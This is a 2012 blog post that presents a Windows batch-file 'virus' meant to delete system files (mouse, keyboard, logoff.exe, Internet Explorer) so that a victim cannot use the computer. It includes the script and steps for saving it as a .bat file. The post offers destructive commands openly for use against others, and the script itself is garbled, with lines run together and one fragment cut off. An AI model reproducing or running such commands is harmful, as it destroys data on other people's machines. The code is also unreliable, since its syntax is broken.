Monday, July 16, 2012

Virus to Delete mouse,explore,logoff using Batch Programming


Usually we write simple viruses in batch programming.  This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.


@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboardcopy C:\windows\@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
How to Use this Code ?
  • Open Notepad 
  • Paste this Code in Notepad 
  • Save the Notepad file with .bat extension ( e.g. --> virus.bat )

How to get out of such a condition ----> Shutdown from main switch or directly from the CPU







Also you can Please Like and Share the post and subscribe for more :)
If you face any problems or doubts in this post , Please let us know in the comments below .

0 comments:

Post a Comment